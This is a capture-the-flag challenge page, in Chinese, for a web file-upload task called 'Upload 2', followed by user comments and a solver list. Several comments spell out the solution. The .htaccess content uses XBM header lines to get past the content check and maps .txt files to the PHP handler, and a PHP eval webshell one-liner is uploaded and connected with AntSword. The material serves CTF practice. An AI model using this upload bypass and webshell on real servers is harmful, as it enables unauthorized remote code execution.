Upload 2WEB 未解决

分数: 0 金币: 0
题目作者: 未知
一  血: Max_yiz
一血奖励: 0金币
解  决: 186
提  示:
描  述:
We used a blacklist now ... can you **access** the flag now?\n\n\n\ \ **Author**: souad
评论
vincentshine 1月前

两点绕过,非php文件无法被执行,文件内容检查,修改apache配置文件,允许非php文件按照php文件运行执行。

回复 0

HWHHJ 6月前

逆天题目,还是能做

回复 0
miko88 4月前

上传的.htaccess和txt不在同一目录,是怎么做的啊

回复 0

toxi 9月前

只需要把文件后缀的.php换成.php5即可

回复 0

啊这这 9月前

题目非常好 不过我有个疑问 为什么我上传的shell木马中的提交参数函数必须是REQUEST还要是大写 我尝试了GET POST都不行 大写是语法只能是大写还是其他原因吗

回复 1
xiaoxiao972521 8月前

可以吧,$_GET $_REQUEST 都行,这些属于php函数,就是这个写法

回复 0

我不知丢答案 9月前

为什么我上传.user.ini文件去连的时候连不上??

回复 0

JJhello 1年前

接下面,内容为一句话木马,然后蚁剑连shell.txt的路径即可

回复 0

JJhello 1年前

上传一个文件名为 ".htaccess",注意,文件名前面没有任何东西的,文件内容为: #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 然后上传shell.txt,内容为

回复 0

samRsa 1年前

1、bp抓包上传.htaccess #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 2、上传马 GIF89a <?php @eval($_POST['cmd']); ?>

回复 0

PandaCattle 1年前

看了官方wp就知道有多离谱。。https://github.com/Shellmates/HackINI-2k23-public/blob/main/web/upload-2/solve/README.md

回复 0

hopeinhand 1年前

后缀php不行,换后缀php5发现容器只允许.php后缀执行命令,使用.htaccess绕过

回复 0
zuoyantiao115 4月前

@PandaCattle #define width 16 #define height 7在这里起到的作用是什么?

回复 0

PandaCattle 1年前

@jiangbw 做出来了,只能说逆天,.htaccess内容里面必须有#define width 16 #define height 7

回复 0

PandaCattle 1年前

@jiangbw 我也一样 直接报错了 是不是环境有问题

回复 0

jiangbw 1年前

@niano.0 .htaccess上传完就跳界面了,那怎么绕过啊

回复 0

niano.0 1年前

@xjc7580 大佬,怎么做的呀

回复 0

xjc7580 1年前

大佬,再给点提示呗,上传.htaccess与上传的shell不一个目录啊

回复 1

WriteUp

image
lolthis223

1 金币

评分(2)

解题动态

wangjianguo 攻破了该题 1天前
tz001 攻破了该题 12天前
bugku111rao 攻破了该题 16天前
19581700609 攻破了该题 16天前
flaglspursuer 攻破了该题 22天前
coldplay99999 攻破了该题 25天前
xxxxhunter 攻破了该题 1月前
chenlin 攻破了该题 1月前
chuitoufa 攻破了该题 1月前
vincentshine 攻破了该题 1月前
bugbiubiubiu 攻破了该题 2月前
wangqi666 攻破了该题 2月前
794250102 攻破了该题 2月前
magic317803335 攻破了该题 2月前
hsyqs 攻破了该题 2月前
Timeo 攻破了该题 2月前
adminasdfg 攻破了该题 2月前
UrgerZ 攻破了该题 2月前
xggs 攻破了该题 2月前
阮禾 攻破了该题 2月前
问题反馈